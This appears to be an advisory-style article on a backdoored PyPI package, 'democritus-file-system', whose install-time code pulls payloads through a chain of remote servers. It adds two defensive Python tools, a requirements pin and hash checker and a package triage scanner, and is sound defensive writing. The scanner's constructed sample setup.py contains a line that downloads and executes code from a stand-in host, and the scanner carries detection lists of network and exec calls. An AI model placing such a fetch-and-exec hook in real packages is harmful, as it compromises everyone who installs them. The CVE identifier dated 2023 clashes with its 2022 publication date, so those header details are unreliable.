The package was renamed on PyPI from democritus-file-system to democritus-file-system-backdoor. The good news is that the package has not been updated since then, and it was only ever distributed via PyPI. Installing the package with pip did not cause any immediate, visible problems, which is exactly what makes this kind of backdoor easy to miss. The risk is in unpinned installs: if a new release were published, pip would pull that updated version instead of the old one on the next install or upgrade.
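The paragraph above (and the restatement under the CVE heading below) makes one practical point: an unpinned dependency silently follows whatever the index serves next. The following added example, which is not code from the original post or from the package discussed, is a small pre-flight check that parses a requirements file the way pip does (comments, backslash continuations, `--hash=` options) and reports every entry that is not both pinned with `==` and locked to a sha256 hash. The sample requirements text and the all-zero hash are constructed placeholders, not real values.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed requirements.txt (not a real lock file): one entry that is pinned
# and hash-locked, and two that would follow whatever the index serves next.
SAMPLE_REQUIREMENTS = """\
# pinned and hash-locked: pip refuses any file whose sha256 differs
democritus-file-system==0.1.0 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
requests>=2.0          # floating lower bound, no hash
six                    # not pinned at all
"""

# name, optional version specifier (==, >=, <, !=, ~=), then options
REQ_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*(?P<spec>[=<>!~]\S*)?")
HASH_RE = re.compile(r"--hash=(\S+)")
SHA256_RE = re.compile(r"sha256:[0-9a-f]{64}")


@dataclass
class Requirement:
    name: str
    specifier: str
    hashes: List[str] = field(default_factory=list)

    def is_locked(self) -> bool:
        """Exact version plus at least one well-formed sha256 hash."""
        return self.specifier.startswith("==") and any(
            SHA256_RE.fullmatch(h) for h in self.hashes
        )


def _logical_lines(text: str) -> List[str]:
    """Strip comments and join backslash-continued lines, as pip does."""
    lines, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            lines.append(buf.strip())
        buf = ""
    return lines


def parse_requirements(text: str) -> List[Requirement]:
    reqs = []
    for line in _logical_lines(text):
        if line.startswith("-"):
            continue  # global options such as --index-url are not requirements
        m = REQ_RE.match(line)
        if not m:
            continue
        reqs.append(Requirement(m.group("name"), m.group("spec") or "", HASH_RE.findall(line)))
    return reqs


def unlocked(text: str) -> List[str]:
    """Names of requirements that an attacker-controlled new release could replace."""
    return [r.name for r in parse_requirements(text) if not r.is_locked()]


if __name__ == "__main__":
    for name in unlocked(SAMPLE_REQUIREMENTS):
        print(f"not pinned+hashed: {name}")
```

pip enforces the same rule at install time when every entry carries a hash and you run `pip install --require-hashes -r requirements.txt`; the checker above is for catching the unlocked lines in review or CI before that install fails.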

Some of the files in the package contained code that runs on any machine simply by having the package installed. The affected files included an XML file and a file containing a URL. That URL pointed to a package on another PyPI server, which in turn contained code that downloaded and executed a file from a further server; that file again contained a URL pointing to yet another package. The result is a chain of remote fetches in which each stage is controlled by whoever operates the server it points to, so the final payload cannot be determined from the package contents alone.
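The staged download chain described above (and again under the CVE heading) leaves two static fingerprints in a package: code that fetches from the network and hands the result to `exec`, and URLs sitting in files that are not code (XML, plain text) so that they are only reached at runtime. The following added example, written for this article and not taken from the original post or the package itself, is a triage scanner that walks an unpacked package, flags network and execution calls in Python files by AST, and lists every URL in every file. The sample package layout and the `example.invalid` URLs are constructed for the demonstration; the call-name lists are a heuristic for triage, not a definitive detector.

```python
import ast
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List

# Call names that fetch remote content or execute arbitrary code. Any of these
# in setup.py, or anywhere in a small utility package, deserves a look. These
# are heuristic names (e.g. "get" also matches dict.get), so review hits by hand.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
EXEC_CALLS = {"exec", "eval", "system", "Popen", "run", "call", "check_output"}
URL_RE = re.compile(rb"https?://[^\s'\"<>]+")


@dataclass(frozen=True)
class Finding:
    path: str    # file relative to the package root
    kind: str    # "network", "exec", or "url"
    detail: str  # the call name or the URL that triggered the finding


def _call_name(node: ast.Call) -> str:
    # exec(...) -> "exec"; urllib.request.urlopen(...) -> "urlopen"
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def scan_python(rel: str, source: bytes) -> List[Finding]:
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # code that does not parse as Python 3 is itself worth a look
        return [Finding(rel, "exec", "unparseable python (possible obfuscation)")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                findings.append(Finding(rel, "network", name))
            elif name in EXEC_CALLS:
                findings.append(Finding(rel, "exec", name))
    return findings


def scan_package(root: str) -> List[Finding]:
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as f:
                data = f.read()
            if fn.endswith(".py"):
                findings.extend(scan_python(rel, data))
            # URLs in any file, code or not: the XML and text files in the
            # article are harmless on their own and only matter because code
            # reads them and follows what they point to.
            for m in URL_RE.findall(data):
                findings.append(Finding(rel, "url", m.decode("ascii", "replace")))
    return sorted(findings, key=lambda f: (f.path, f.kind, f.detail))


def build_sample_package() -> str:
    """Write a constructed sample package to a temp dir and return its path.
    Layout and example.invalid URLs are invented for this example."""
    root = tempfile.mkdtemp(prefix="pkg-")
    files = {
        "setup.py": (
            b"from urllib.request import urlopen\n"
            b"from setuptools import setup\n"
            b"exec(urlopen('http://stage1.example.invalid/loader.py').read())\n"
            b"setup(name='sample', version='0.1.0')\n"
        ),
        "sample/data/config.xml": b"<config><source>http://stage2.example.invalid/next</source></config>\n",
        "sample/data/next_url.txt": b"http://stage3.example.invalid/payload\n",
        "sample/__init__.py": b"def read_file(p):\n    return open(p).read()\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for f in scan_package(build_sample_package()):
        print(f"{f.path:28} {f.kind:8} {f.detail}")
```

Run it against an sdist unpacked with `tar xf`, not against the installed package, so that setup.py is included: install-time code in setup.py runs under pip before anything else in the package is visible, which is why a fetch-and-exec there is the highest-priority hit.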

Conclusion: Stay Vigilant

This was a great reminder to always stay vigilant and use caution when installing any package: read what a package does before installing it, and pin the versions you depend on so that a later release cannot replace them unnoticed.

CVE-2023-40812

The CVE entry covers the package distributed on PyPI as democritus-file-system (since renamed, as noted above). The package has not been updated since the backdoor was identified, and installing the existing release does not cause any immediate, visible problems. If a new release were published, however, any install that is not pinned to the known version would pull that release instead.

The malicious logic lives in files that run on any machine with the package installed: an XML file and a file containing a URL. The URL points to a third-party server that returns another file containing a URL, which points to a further server, and so on. Each hop is a separate place where the operator can change what eventually runs, so the payload delivered to a given victim cannot be determined from the package contents alone.

Timeline

Published on: 09/19/2022 15:15:00 UTC
Last modified on: 09/21/2022 15:39:00 UTC
